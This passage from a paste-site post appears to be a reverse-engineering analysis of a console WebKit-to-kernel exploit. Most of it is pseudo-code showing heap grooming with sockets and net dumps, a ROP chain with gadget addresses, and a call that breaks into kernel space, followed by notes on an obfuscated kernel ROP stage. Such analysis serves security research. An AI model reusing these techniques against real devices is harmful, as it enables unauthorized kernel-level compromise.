  398. 0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
  399. 0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
  400. 0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
  401. 0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
  402. 0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
  403. 0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
  404. 0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
  405. 0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
  406. 0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
  407. 0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
  408. 0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
  409. 0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
  410. 0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
  411. 0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
  412. 0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
  413. 0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
  414. 0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
  415. 0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
  416. 0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
  417. 0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
  418. 0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
  419. 0x00(x_stack + 0x00008538) = sceNetSocket(x_stack + 0x00010518, 0x00000002, 0x00000001, 0x00000000);
  420. 0x00(x_stack + 0x0000853C) = sceNetSocket(x_stack + 0x00010520, 0x00000002, 0x00000001, 0x00000000);
  421. 0x00(x_stack + 0x00008540) = sceNetSocket(x_stack + 0x00010528, 0x00000002, 0x00000001, 0x00000000);
  422. 0x00(x_stack + 0x00008544) = sceNetSocket(x_stack + 0x00010530, 0x00000002, 0x00000001, 0x00000000);
  423. 0x00(x_stack + 0x00008548) = sceNetSocket(x_stack + 0x00010538, 0x00000002, 0x00000001, 0x00000000);
  424. 0x00(x_stack + 0x0000854C) = sceNetSocket(x_stack + 0x00010540, 0x00000002, 0x00000001, 0x00000000);
  425. 0x00(x_stack + 0x00008550) = sceNetSocket(x_stack + 0x00010548, 0x00000002, 0x00000001, 0x00000000);
  426. 0x00(x_stack + 0x00008554) = sceNetSocket(x_stack + 0x00010550, 0x00000002, 0x00000001, 0x00000000);
  427. 0x00(x_stack + 0x00008558) = sceNetSocket(x_stack + 0x00010558, 0x00000002, 0x00000001, 0x00000000);
  428. 0x00(x_stack + 0x0000855C) = sceNetSocket(x_stack + 0x00010560, 0x00000002, 0x00000001, 0x00000000);
  429. 0x00(x_stack + 0x00008560) = sceNetSocket(x_stack + 0x00010568, 0x00000002, 0x00000001, 0x00000000);
  430. 0x00(x_stack + 0x00008564) = sceNetSocket(x_stack + 0x00010570, 0x00000002, 0x00000001, 0x00000000);
  431. 0x00(x_stack + 0x00008568) = sceNetSocket(x_stack + 0x00010578, 0x00000002, 0x00000001, 0x00000000);
  432. 0x00(x_stack + 0x0000856C) = sceNetSocket(x_stack + 0x00010580, 0x00000002, 0x00000001, 0x00000000);
  433. 0x00(x_stack + 0x00008570) = sceNetSocket(x_stack + 0x00010588, 0x00000002, 0x00000001, 0x00000000);
  434. 0x00(x_stack + 0x00008574) = sceNetSocket(x_stack + 0x00010590, 0x00000002, 0x00000001, 0x00000000);
  435. 0x00(x_stack + 0x00008578) = sceNetSocket(x_stack + 0x00010598, 0x00000002, 0x00000001, 0x00000000);
  436. 0x00(x_stack + 0x0000857C) = sceNetSocket(x_stack + 0x000105A0, 0x00000002, 0x00000001, 0x00000000);
  437. 0x00(x_stack + 0x00008580) = sceNetSocket(x_stack + 0x000105A8, 0x00000002, 0x00000001, 0x00000000);
  438. 0x00(x_stack + 0x00008584) = sceNetSocket(x_stack + 0x000105B0, 0x00000002, 0x00000001, 0x00000000);
  439. 0x00(x_stack + 0x00008588) = sceNetSocket(x_stack + 0x000105B8, 0x00000002, 0x00000001, 0x00000000);
  440. 0x00(x_stack + 0x0000858C) = sceNetSocket(x_stack + 0x000105C0, 0x00000002, 0x00000001, 0x00000000);
  441. 0x00(x_stack + 0x00008590) = sceNetSocket(x_stack + 0x000105C8, 0x00000002, 0x00000001, 0x00000000);
  442. 0x00(x_stack + 0x00008594) = sceNetSocket(x_stack + 0x000105D0, 0x00000002, 0x00000001, 0x00000000);
  443. 0x00(x_stack + 0x00008598) = sceNetSocket(x_stack + 0x000105D8, 0x00000002, 0x00000001, 0x00000000);
  444. 0x00(x_stack + 0x0000859C) = sceNetSocket(x_stack + 0x000105E0, 0x00000002, 0x00000001, 0x00000000);
  445. 0x00(x_stack + 0x000085A0) = sceNetSocket(x_stack + 0x000105E8, 0x00000002, 0x00000001, 0x00000000);
  446. 0x00(x_stack + 0x000085A4) = sceNetSocket(x_stack + 0x000105F0, 0x00000002, 0x00000001, 0x00000000);
  447. 0x00(x_stack + 0x000085A8) = sceNetSocket(x_stack + 0x000105F8, 0x00000002, 0x00000001, 0x00000000);
  448. 0x00(x_stack + 0x000085AC) = sceNetSocket(x_stack + 0x00010600, 0x00000002, 0x00000001, 0x00000000);
  449.  
  450. // sceNetSocket("sss", AF_INET, SOCK_STREAM, 0);
  451. 0x00(x_stack + 0x000085B8) = sceNetSocket(x_stack + 0x00010608, 0x00000002, 0x00000001, 0x00000000);
  452.  
  453. // sceNetSocket("tst", AF_INET, 0x7, 0);
  454. 0x00(x_stack + 0x000085C4) = sceNetSocket(x_stack + 0x00010614, 0x00000002, 0x00000007, 0x00000000);
  455.  
  456. // Setup "mhm" ROP
  457. 0x00(x_stack + 0x00008708) = 0x008DD9B5
  458. 0x00(x_stack + 0x0000870C) = 0x000085C4
  459. 0x00(x_stack + 0x00008710) = 0x10007300
  460. 0x00(x_stack + 0x00008714) = 0x00000000
  461. 0x00(x_stack + 0x00008718) = 0x00000000
  462. 0x00(x_stack + 0x0000871C) = 0x00009F90
  463. 0x00(x_stack + 0x00008720) = 0x00000000
  464. 0x00(x_stack + 0x00008724) = 0x000FCDBB
  465. 0x00(x_stack + 0x00008728) = 0x00008810
  466. 0x00(x_stack + 0x0000872C) = 0x000059A9
  467. 0x00(x_stack + 0x00008730) = 0x00000000
  468. 0x00(x_stack + 0x00008734) = 0x00000519
  469.  
  470. /*
  471. "mhm" ROP
  472.  
  473. // Issue an IOCtl to "tst" FD
  474. int ioctl_res = sceNetSyscallIoctl(x_stack + 0x000085C4, 0x10007300, 0x00000000);
  475.  
  476. // Store IOCtl result
  477. 0x00(x_stack + 0x00008810) = ioctl_res;
  478.  
  479. // Deadlock
  480. sceWebkit_519();
  481. */
  482.  
  483. // Copy "mhm" ROP chain into "mhm" thread's stack
  484. memcpy(0x00(x_stack + 0x000086FC), x_stack + 0x00008708, 0x00000100);
  485.  
  486. // Set stack pointer
  487. 0x00(x_stack + 0x00008830) = x_stack + 0x000086FC;
  488.  
  489. // Set PC
  490. 0x00(x_stack + 0x00008834) = 0x000C048B; // POP {PC}
  491.  
  492. // sceNetSocket("tmp", AF_INET, SOCK_STREAM, 0);
  493. 0x00(x_stack + 0x000085D0) = sceNetSocket(x_stack + 0x00010620, 0x00000002, 0x00000001, 0x00000000);
  494.  
  495. // Create several net dumps
  496. // sceNetDumpCreate("ddd", 0x00000F00, 0x00000000);
  497. 0x00(x_stack + 0x000085F4) = sceNetDumpCreate(x_stack + 0x0001062C, 0x00000F00, 0x00000000);
  498. 0x00(x_stack + 0x000085F8) = sceNetDumpCreate(x_stack + 0x00010638, 0x00000F00, 0x00000000);
  499. 0x00(x_stack + 0x000085FC) = sceNetDumpCreate(x_stack + 0x00010644, 0x00000F00, 0x00000000);
  500. 0x00(x_stack + 0x00008600) = sceNetDumpCreate(x_stack + 0x00010650, 0x00000F00, 0x00000000);
  501. 0x00(x_stack + 0x00008604) = sceNetDumpCreate(x_stack + 0x0001065C, 0x00000F00, 0x00000000);
  502. 0x00(x_stack + 0x00008608) = sceNetDumpCreate(x_stack + 0x00010668, 0x00000F00, 0x00000000);
  503. 0x00(x_stack + 0x0000860C) = sceNetDumpCreate(x_stack + 0x00010674, 0x00000F00, 0x00000000);
  504. 0x00(x_stack + 0x00008610) = sceNetDumpCreate(x_stack + 0x00010680, 0x00000F00, 0x00000000);
  505. 0x00(x_stack + 0x00008614) = sceNetDumpCreate(x_stack + 0x0001068C, 0x00000F00, 0x00000000);
  506. 0x00(x_stack + 0x000085E8) = sceNetDumpCreate(x_stack + 0x00010698, 0x00000F00, 0x00000000);
  507. 0x00(x_stack + 0x000085DC) = sceNetDumpCreate(x_stack + 0x000106A4, 0x00001000, 0x00000000);
  508.  
  509. // Destroy some dumps
  510. sceNetDumpDestroy(x_stack + 0x000085F4);
  511. sceNetDumpDestroy(x_stack + 0x000085FC);
  512. sceNetDumpDestroy(x_stack + 0x00008604);
  513. sceNetDumpDestroy(x_stack + 0x0000860C);
  514. sceNetDumpDestroy(x_stack + 0x00008614);
  515. sceNetDumpDestroy(x_stack + 0x000085E8);
  516.  
  517. // Create more net dumps
  518. sceNetDumpCreate(x_stack + 0x000106B0, 0x000D0000, 0x00000000);
  519. sceNetDumpCreate(x_stack + 0x000106BC, 0x000CFF00, 0x00000000);
  520. sceNetDumpCreate(x_stack + 0x000106C8, 0x000CFE00, 0x00000000);
  521. sceNetDumpCreate(x_stack + 0x000106D4, 0x000CFD00, 0x00000000);
  522. sceNetDumpCreate(x_stack + 0x000106E0, 0x000CFC00, 0x00000000);
  523. sceNetDumpCreate(x_stack + 0x000106EC, 0x000CFB00, 0x00000000);
  524. sceNetDumpCreate(x_stack + 0x000106F8, 0x000CFA00, 0x00000000);
  525. sceNetDumpCreate(x_stack + 0x00010704, 0x000CF900, 0x00000000);
  526. sceNetDumpCreate(x_stack + 0x00010710, 0x000CF800, 0x00000000);
  527. sceNetDumpCreate(x_stack + 0x0001071C, 0x000CF700, 0x00000000);
  528. sceNetDumpCreate(x_stack + 0x00010728, 0x000CF600, 0x00000000);
  529. sceNetDumpCreate(x_stack + 0x00010734, 0x000CF500, 0x00000000);
  530. sceNetDumpCreate(x_stack + 0x00010740, 0x000CF400, 0x00000000);
  531. sceNetDumpCreate(x_stack + 0x0001074C, 0x000CF300, 0x00000000);
  532. sceNetDumpCreate(x_stack + 0x00010758, 0x000CF200, 0x00000000);
  533. sceNetDumpCreate(x_stack + 0x00010764, 0x000CF100, 0x00000000);
  534. sceNetDumpCreate(x_stack + 0x00010770, 0x000CF000, 0x00000000);
  535. sceNetDumpCreate(x_stack + 0x0001077C, 0x000CEF00, 0x00000000);
  536. sceNetDumpCreate(x_stack + 0x00010788, 0x000CEE00, 0x00000000);
  537. sceNetDumpCreate(x_stack + 0x00010794, 0x000CED00, 0x00000000);
  538. sceNetDumpCreate(x_stack + 0x000107A0, 0x000CEC00, 0x00000000);
  539. sceNetDumpCreate(x_stack + 0x000107AC, 0x000CEB00, 0x00000000);
  540. sceNetDumpCreate(x_stack + 0x000107B8, 0x000CEA00, 0x00000000);
  541. sceNetDumpCreate(x_stack + 0x000107C4, 0x000CE900, 0x00000000);
  542. sceNetDumpCreate(x_stack + 0x000107D0, 0x000CE800, 0x00000000);
  543. sceNetDumpCreate(x_stack + 0x000107DC, 0x000CE700, 0x00000000);
  544. sceNetDumpCreate(x_stack + 0x000107E8, 0x000CE600, 0x00000000);
  545. sceNetDumpCreate(x_stack + 0x000107F4, 0x000CE500, 0x00000000);
  546. sceNetDumpCreate(x_stack + 0x00010800, 0x000CE400, 0x00000000);
  547. sceNetDumpCreate(x_stack + 0x0001080C, 0x000CE300, 0x00000000);
  548. sceNetDumpCreate(x_stack + 0x00010818, 0x000CE200, 0x00000000);
  549. sceNetDumpCreate(x_stack + 0x00010824, 0x000CE100, 0x00000000);
  550. sceNetDumpCreate(x_stack + 0x00010830, 0x000CE000, 0x00000000);
  551. sceNetDumpCreate(x_stack + 0x0001083C, 0x000CDF00, 0x00000000);
  552. sceNetDumpCreate(x_stack + 0x00010848, 0x000CDE00, 0x00000000);
  553. sceNetDumpCreate(x_stack + 0x00010854, 0x000CDD00, 0x00000000);
  554. sceNetDumpCreate(x_stack + 0x00010860, 0x000CDC00, 0x00000000);
  555. sceNetDumpCreate(x_stack + 0x0001086C, 0x000CDB00, 0x00000000);
  556. sceNetDumpCreate(x_stack + 0x00010878, 0x000CDA00, 0x00000000);
  557. sceNetDumpCreate(x_stack + 0x00010884, 0x000CD900, 0x00000000);
  558. sceNetDumpCreate(x_stack + 0x00010890, 0x000CD800, 0x00000000);
  559. sceNetDumpCreate(x_stack + 0x0001089C, 0x000CD700, 0x00000000);
  560. sceNetDumpCreate(x_stack + 0x000108A8, 0x000CD600, 0x00000000);
  561. sceNetDumpCreate(x_stack + 0x000108B4, 0x000CD500, 0x00000000);
  562. sceNetDumpCreate(x_stack + 0x000108C0, 0x000CD400, 0x00000000);
  563. sceNetDumpCreate(x_stack + 0x000108CC, 0x000CD300, 0x00000000);
  564. sceNetDumpCreate(x_stack + 0x000108D8, 0x000CD200, 0x00000000);
  565. sceNetDumpCreate(x_stack + 0x000108E4, 0x000CD100, 0x00000000);
  566. sceNetDumpCreate(x_stack + 0x000108F0, 0x000CD000, 0x00000000);
  567. sceNetDumpCreate(x_stack + 0x000108FC, 0x000CCF00, 0x00000000);
  568. sceNetDumpCreate(x_stack + 0x00010908, 0x000CCE00, 0x00000000);
  569. sceNetDumpCreate(x_stack + 0x00010914, 0x000CCD00, 0x00000000);
  570. sceNetDumpCreate(x_stack + 0x00010920, 0x000CCC00, 0x00000000);
  571. sceNetDumpCreate(x_stack + 0x0001092C, 0x000CCB00, 0x00000000);
  572. sceNetDumpCreate(x_stack + 0x00010938, 0x000CCA00, 0x00000000);
  573. sceNetDumpCreate(x_stack + 0x00010944, 0x000CC900, 0x00000000);
  574. sceNetDumpCreate(x_stack + 0x00010950, 0x000CC800, 0x00000000);
  575. sceNetDumpCreate(x_stack + 0x0001095C, 0x000CC700, 0x00000000);
  576. sceNetDumpCreate(x_stack + 0x00010968, 0x000CC600, 0x00000000);
  577. sceNetDumpCreate(x_stack + 0x00010974, 0x000CC500, 0x00000000);
  578. sceNetDumpCreate(x_stack + 0x00010980, 0x000CC400, 0x00000000);
  579. sceNetDumpCreate(x_stack + 0x0001098C, 0x000CC300, 0x00000000);
  580. sceNetDumpCreate(x_stack + 0x00010998, 0x000CC200, 0x00000000);
  581. sceNetDumpCreate(x_stack + 0x000109A4, 0x000CC100, 0x00000000);
  582. sceNetDumpCreate(x_stack + 0x000109B0, 0x000CC000, 0x00000000);
  583. sceNetDumpCreate(x_stack + 0x000109BC, 0x000CBF00, 0x00000000);
  584. sceNetDumpCreate(x_stack + 0x000109C8, 0x000CBE00, 0x00000000);
  585. sceNetDumpCreate(x_stack + 0x000109D4, 0x000CBD00, 0x00000000);
  586. sceNetDumpCreate(x_stack + 0x000109E0, 0x000CBC00, 0x00000000);
  587. sceNetDumpCreate(x_stack + 0x000109EC, 0x000CBB00, 0x00000000);
  588. sceNetDumpCreate(x_stack + 0x000109F8, 0x000CBA00, 0x00000000);
  589. sceNetDumpCreate(x_stack + 0x00010A04, 0x000CB900, 0x00000000);
  590. sceNetDumpCreate(x_stack + 0x00010A10, 0x000CB800, 0x00000000);
  591. sceNetDumpCreate(x_stack + 0x00010A1C, 0x000CB700, 0x00000000);
  592. sceNetDumpCreate(x_stack + 0x00010A28, 0x000CB600, 0x00000000);
  593. sceNetDumpCreate(x_stack + 0x00010A34, 0x000CB500, 0x00000000);
  594. sceNetDumpCreate(x_stack + 0x00010A40, 0x000CB400, 0x00000000);
  595. sceNetDumpCreate(x_stack + 0x00010A4C, 0x000CB300, 0x00000000);
  596. sceNetDumpCreate(x_stack + 0x00010A58, 0x000CB200, 0x00000000);
  597. sceNetDumpCreate(x_stack + 0x00010A64, 0x000CB100, 0x00000000);
  598. sceNetDumpCreate(x_stack + 0x00010A70, 0x000CB000, 0x00000000);
  599. sceNetDumpCreate(x_stack + 0x00010A7C, 0x000CAF00, 0x00000000);
  600. sceNetDumpCreate(x_stack + 0x00010A88, 0x000CAE00, 0x00000000);
  601. sceNetDumpCreate(x_stack + 0x00010A94, 0x000CAD00, 0x00000000);
  602. sceNetDumpCreate(x_stack + 0x00010AA0, 0x000CAC00, 0x00000000);
  603. sceNetDumpCreate(x_stack + 0x00010AAC, 0x000CAB00, 0x00000000);
  604. sceNetDumpCreate(x_stack + 0x00010AB8, 0x000CAA00, 0x00000000);
  605. sceNetDumpCreate(x_stack + 0x00010AC4, 0x000CA900, 0x00000000);
  606. sceNetDumpCreate(x_stack + 0x00010AD0, 0x000CA800, 0x00000000);
  607. sceNetDumpCreate(x_stack + 0x00010ADC, 0x000CA700, 0x00000000);
  608. sceNetDumpCreate(x_stack + 0x00010AE8, 0x000CA600, 0x00000000);
  609. sceNetDumpCreate(x_stack + 0x00010AF4, 0x000CA500, 0x00000000);
  610. sceNetDumpCreate(x_stack + 0x00010B00, 0x000CA400, 0x00000000);
  611. sceNetDumpCreate(x_stack + 0x00010B0C, 0x000CA300, 0x00000000);
  612. sceNetDumpCreate(x_stack + 0x00010B18, 0x000CA200, 0x00000000);
  613. sceNetDumpCreate(x_stack + 0x00010B24, 0x000CA100, 0x00000000);
  614. sceNetDumpCreate(x_stack + 0x00010B30, 0x000CA000, 0x00000000);
  615. sceNetDumpCreate(x_stack + 0x00010B3C, 0x000C9F00, 0x00000000);
  616. sceNetDumpCreate(x_stack + 0x00010B48, 0x000C9E00, 0x00000000);
  617. sceNetDumpCreate(x_stack + 0x00010B54, 0x000C9D00, 0x00000000);
  618. sceNetDumpCreate(x_stack + 0x00010B60, 0x000C9C00, 0x00000000);
  619. sceNetDumpCreate(x_stack + 0x00010B6C, 0x000C9B00, 0x00000000);
  620. sceNetDumpCreate(x_stack + 0x00010B78, 0x000C9A00, 0x00000000);
  621. sceNetDumpCreate(x_stack + 0x00010B84, 0x000C9900, 0x00000000);
  622. sceNetDumpCreate(x_stack + 0x00010B90, 0x000C9800, 0x00000000);
  623. sceNetDumpCreate(x_stack + 0x00010B9C, 0x000C9700, 0x00000000);
  624. sceNetDumpCreate(x_stack + 0x00010BA8, 0x000C9600, 0x00000000);
  625. sceNetDumpCreate(x_stack + 0x00010BB4, 0x000C9500, 0x00000000);
  626. sceNetDumpCreate(x_stack + 0x00010BC0, 0x000C9400, 0x00000000);
  627. sceNetDumpCreate(x_stack + 0x00010BCC, 0x000C9300, 0x00000000);
  628. sceNetDumpCreate(x_stack + 0x00010BD8, 0x000C9200, 0x00000000);
  629. sceNetDumpCreate(x_stack + 0x00010BE4, 0x000C9100, 0x00000000);
  630. sceNetDumpCreate(x_stack + 0x00010BF0, 0x000C9000, 0x00000000);
  631. sceNetDumpCreate(x_stack + 0x00010BFC, 0x000C8F00, 0x00000000);
  632. sceNetDumpCreate(x_stack + 0x00010C08, 0x000C8E00, 0x00000000);
  633. sceNetDumpCreate(x_stack + 0x00010C14, 0x000C8D00, 0x00000000);
  634. sceNetDumpCreate(x_stack + 0x00010C20, 0x000C8C00, 0x00000000);
  635. sceNetDumpCreate(x_stack + 0x00010C2C, 0x000C8B00, 0x00000000);
  636. sceNetDumpCreate(x_stack + 0x00010C38, 0x000C8A00, 0x00000000);
  637. sceNetDumpCreate(x_stack + 0x00010C44, 0x000C8900, 0x00000000);
  638. sceNetDumpCreate(x_stack + 0x00010C50, 0x000C8800, 0x00000000);
  639. sceNetDumpCreate(x_stack + 0x00010C5C, 0x000C8700, 0x00000000);
  640. sceNetDumpCreate(x_stack + 0x00010C68, 0x000C8600, 0x00000000);
  641. sceNetDumpCreate(x_stack + 0x00010C74, 0x000C8500, 0x00000000);
  642. sceNetDumpCreate(x_stack + 0x00010C80, 0x000C8400, 0x00000000);
  643. sceNetDumpCreate(x_stack + 0x00010C8C, 0x000C8300, 0x00000000);
  644. sceNetDumpCreate(x_stack + 0x00010C98, 0x000C8200, 0x00000000);
  645. sceNetDumpCreate(x_stack + 0x00010CA4, 0x000C8100, 0x00000000);
  646. sceNetDumpCreate(x_stack + 0x00010CB0, 0x000C8000, 0x00000000);
  647. sceNetDumpCreate(x_stack + 0x00010CBC, 0x000C7F00, 0x00000000);
  648. sceNetDumpCreate(x_stack + 0x00010CC8, 0x000C7E00, 0x00000000);
  649. sceNetDumpCreate(x_stack + 0x00010CD4, 0x000C7D00, 0x00000000);
  650. sceNetDumpCreate(x_stack + 0x00010CE0, 0x000C7C00, 0x00000000);
  651. sceNetDumpCreate(x_stack + 0x00010CEC, 0x000C7B00, 0x00000000);
  652. sceNetDumpCreate(x_stack + 0x00010CF8, 0x000C7A00, 0x00000000);
  653. sceNetDumpCreate(x_stack + 0x00010D04, 0x000C7900, 0x00000000);
  654. sceNetDumpCreate(x_stack + 0x00010D10, 0x000C7800, 0x00000000);
  655. sceNetDumpCreate(x_stack + 0x00010D1C, 0x000C7700, 0x00000000);
  656. sceNetDumpCreate(x_stack + 0x00010D28, 0x000C7600, 0x00000000);
  657. sceNetDumpCreate(x_stack + 0x00010D34, 0x000C7500, 0x00000000);
  658. sceNetDumpCreate(x_stack + 0x00010D40, 0x000C7400, 0x00000000);
  659. sceNetDumpCreate(x_stack + 0x00010D4C, 0x000C7300, 0x00000000);
  660. sceNetDumpCreate(x_stack + 0x00010D58, 0x000C7200, 0x00000000);
  661. sceNetDumpCreate(x_stack + 0x00010D64, 0x000C7100, 0x00000000);
  662. sceNetDumpCreate(x_stack + 0x00010D70, 0x000C7000, 0x00000000);
  663. sceNetDumpCreate(x_stack + 0x00010D7C, 0x000C6F00, 0x00000000);
  664. sceNetDumpCreate(x_stack + 0x00010D88, 0x000C6E00, 0x00000000);
  665. sceNetDumpCreate(x_stack + 0x00010D94, 0x000C6D00, 0x00000000);
  666. sceNetDumpCreate(x_stack + 0x00010DA0, 0x000C6C00, 0x00000000);
  667. sceNetDumpCreate(x_stack + 0x00010DAC, 0x000C6B00, 0x00000000);
  668. sceNetDumpCreate(x_stack + 0x00010DB8, 0x000C6A00, 0x00000000);
  669. sceNetDumpCreate(x_stack + 0x00010DC4, 0x000C6900, 0x00000000);
  670. sceNetDumpCreate(x_stack + 0x00010DD0, 0x000C6800, 0x00000000);
  671. sceNetDumpCreate(x_stack + 0x00010DDC, 0x000C6700, 0x00000000);
  672. sceNetDumpCreate(x_stack + 0x00010DE8, 0x000C6600, 0x00000000);
  673. sceNetDumpCreate(x_stack + 0x00010DF4, 0x000C6500, 0x00000000);
  674. sceNetDumpCreate(x_stack + 0x00010E00, 0x000C6400, 0x00000000);
  675. sceNetDumpCreate(x_stack + 0x00010E0C, 0x000C6300, 0x00000000);
  676. sceNetDumpCreate(x_stack + 0x00010E18, 0x000C6200, 0x00000000);
  677. sceNetDumpCreate(x_stack + 0x00010E24, 0x000C6100, 0x00000000);
  678. sceNetDumpCreate(x_stack + 0x00010E30, 0x000C6000, 0x00000000);
  679. sceNetDumpCreate(x_stack + 0x00010E3C, 0x00001000, 0x00000000);
  680. sceNetDumpCreate(x_stack + 0x00010E48, 0x00001000, 0x00000000);
  681.  
  682. // Start "mhm" thread
  683. // Thread arguments are loaded into R1 and the gadget
  684. // at the thread's entrypoint then loads register values
  685. // from it, overwritting SP and PC and triggering the
  686. // ROP chain
  687. sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
  688.  
  689. // Delay thread
  690. sceKernelDelayThread(1500000);
  691.  
  692. // Close no longer needed sockets
  693. sceNetSyscallClose(x_stack + 0x00008470);
  694. sceNetSyscallClose(x_stack + 0x00008478);
  695. sceNetSyscallClose(x_stack + 0x00008480);
  696. sceNetSyscallClose(x_stack + 0x00008488);
  697. sceNetSyscallClose(x_stack + 0x00008490);
  698. sceNetSyscallClose(x_stack + 0x00008498);
  699. sceNetSyscallClose(x_stack + 0x000084A0);
  700. sceNetSyscallClose(x_stack + 0x000084A8);
  701. sceNetSyscallClose(x_stack + 0x000084B0);
  702. sceNetSyscallClose(x_stack + 0x000084B8);
  703. sceNetSyscallClose(x_stack + 0x000084C0);
  704. sceNetSyscallClose(x_stack + 0x000084C8);
  705. sceNetSyscallClose(x_stack + 0x000084D0);
  706. sceNetSyscallClose(x_stack + 0x000084D8);
  707. sceNetSyscallClose(x_stack + 0x000084E0);
  708. sceNetSyscallClose(x_stack + 0x000084E8);
  709. sceNetSyscallClose(x_stack + 0x000084F0);
  710. sceNetSyscallClose(x_stack + 0x000084F8);
  711. sceNetSyscallClose(x_stack + 0x00008500);
  712. sceNetSyscallClose(x_stack + 0x00008508);
  713. sceNetSyscallClose(x_stack + 0x00008510);
  714. sceNetSyscallClose(x_stack + 0x00008518);
  715. sceNetSyscallClose(x_stack + 0x00008520);
  716. sceNetSyscallClose(x_stack + 0x00008528);
  717. sceNetSyscallClose(x_stack + 0x00008530);
  718. sceNetSyscallClose(x_stack + 0x00008538);
  719. sceNetSyscallClose(x_stack + 0x00008540);
  720. sceNetSyscallClose(x_stack + 0x00008548);
  721. sceNetSyscallClose(x_stack + 0x00008550);
  722. sceNetSyscallClose(x_stack + 0x00008558);
  723. sceNetSyscallClose(x_stack + 0x00008560);
  724. sceNetSyscallClose(x_stack + 0x00008568);
  725. sceNetSyscallClose(x_stack + 0x00008570);
  726. sceNetSyscallClose(x_stack + 0x00008578);
  727. sceNetSyscallClose(x_stack + 0x00008580);
  728. sceNetSyscallClose(x_stack + 0x00008588);
  729. sceNetSyscallClose(x_stack + 0x00008590);
  730. sceNetSyscallClose(x_stack + 0x00008598);
  731. sceNetSyscallClose(x_stack + 0x000085A0);
  732. sceNetSyscallClose(x_stack + 0x000085A8);
  733. sceNetSyscallClose(x_stack + 0x000085C4);
  734.  
  735. // Break into kernel space
  736. sceNetSyscallControl(0x00000000, 0x30000000, x_stack + 0x00008840, 0x000000FC);
  737.  
  738. // Destroy another dump
  739. sceNetDumpDestroy(x_stack + 0x000085DC);
  740.  
  741. // Delay for a while
  742. sceKernelDelayThread(1000000);
  743.  
  744. // Calculate a SceWebkit pointer using the ioctl
  745. // from "mhm" thread (kernel space?)
  746. r0 = 0x00(x_stack + 0x00008810) + SceWebkit_base + 0x00000575;
  747.  
  748. // Unknown
  749. sceWebkit_123();
  750. sceWebkit_CF481();
  751.  
  752. // Destroy specific dumps (constant IDs)
  753. sceNetDumpDestroy(0x00001770);
  754. sceNetDumpDestroy(0x00001771);
  755. sceNetDumpDestroy(0x00001772);
  756. sceNetDumpDestroy(0x00001773);
  757. sceNetDumpDestroy(0x00001774);
  758. sceNetDumpDestroy(0x00001775);
  759. sceNetDumpDestroy(0x00001776);
  760. sceNetDumpDestroy(0x00001777);
  761. sceNetDumpDestroy(0x00001778);
  762. sceNetDumpDestroy(0x00001779);
  763. sceNetDumpDestroy(0x0000177A);
  764. sceNetDumpDestroy(0x0000177B);
  765. sceNetDumpDestroy(0x0000177C);
  766. sceNetDumpDestroy(0x0000177D);
  767. sceNetDumpDestroy(0x0000177E);
  768. sceNetDumpDestroy(0x0000177F);
  769. sceNetDumpDestroy(0x00001780);
  770. sceNetDumpDestroy(0x00001781);
  771. sceNetDumpDestroy(0x00001782);
  772. sceNetDumpDestroy(0x00001783);
  773. sceNetDumpDestroy(0x00001784);
  774. sceNetDumpDestroy(0x00001785);
  775. sceNetDumpDestroy(0x00001786);
  776. sceNetDumpDestroy(0x00001787);
  777. sceNetDumpDestroy(0x00001788);
  778. sceNetDumpDestroy(0x00001789);
  779. sceNetDumpDestroy(0x0000178A);
  780. sceNetDumpDestroy(0x0000178B);
  781. sceNetDumpDestroy(0x0000178C);
  782. sceNetDumpDestroy(0x0000178D);
  783. sceNetDumpDestroy(0x0000178E);
  784. sceNetDumpDestroy(0x0000178F);
  785. sceNetDumpDestroy(0x00001790);
  786.  
  787. // Deadlock
  788. sceWebkit_519(0x00000000);
  789.  
  790.  
  791. - Stage 4 (kernel ROP):
  792. The second ROP payload prepares the stage for a kernel attack.
  793. After it's done, another ROP chain should be starting on the kernel side.
  794. This chain relies on kernel pointers that were leaked during the second payload's execution and is built beforehand.
  795. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.
  796.  
  797. To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the data region.
  798.  
  799.  
  800.  
  801.  
  802. To be continued...
  803. ~ H.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
